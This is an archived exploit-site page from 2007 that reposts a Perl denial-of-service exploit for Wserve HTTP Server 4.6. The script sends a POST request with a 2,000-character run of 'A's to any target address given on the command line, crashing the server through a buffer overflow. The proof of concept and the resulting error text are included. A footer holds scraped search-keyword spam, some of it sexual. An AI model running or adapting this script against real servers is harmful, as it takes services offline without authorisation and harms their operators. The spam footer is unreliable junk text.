about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit




2007-04-06 Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit
Rater as : Moderate Risk

#!perl
# Wserve HTTP Server 4.6 Version (Long Directory Name) Buffer Overflow -
Denial Of Service
# Type :
# Buffer Overflow - Denial of Service
# Release Date :
# {2007-04-05}
# Product / Vendor :
# Wserve HTTP Server
# http://sourceforge.net/projects/whttp
# PoC :
# GET / HTTP/1.0\r\n /127.0.0.1:80/AAAAAA[2000]. 
# Error :
# Buffer Overrun Detected!
# Program:...~\Temp\Rar$EX00.906\wserve\wserve_console.exe
# A buffer overrun has been detected which has corrupted the program's
internal state.The program cannot safely continue 
# execution and must now be terminated

# Exploit :

use LWP::UserAgent;

$unique = LWP::UserAgent->new;

$address = shift or die("Insert A Target");

$req = HTTP::Request->new(POST => "http://$address:80/" .
A x 2000);

$res = $unique->request($req);

print $res->as_string;

# Tested :

# --- Wserve HTTP Server 4.6 ---

# Vulnerable :

# --- Wserve HTTP Server 4.6 ---

# Author :

# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org
securitydot.net - 2007-04-06

Advertising

Copyright 2007, SecurityDot
Fri, 04 Dec 2009 09:11:05 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
red hat Kids gril www.mmh365 qdqy.5d6d. INDIAN FRE www.591sj. RPC over H WS_FTP Ser 200 /compo Khushbu CMS is Fre Www.freese Sex vedio www.kaida1 ww.sex .co dangee mambo Remo www.jxwjs. /search/ex ms02-020 Www.pronic newspublis webex wap.89.com www.waptri sXe Inject Key No.650 www.dvdfox www.sania Antivirus Video bugi WWW.SEXWOR angel Karenasex. www.mobile shop.paipa sexg B p high f www.eadelt Gambar sex MySQL 4.1. mambo Remo jeevakanth www.md3.co www.30199. jpeg vulne Julia pere sinqidian. sexy saniy rotaprint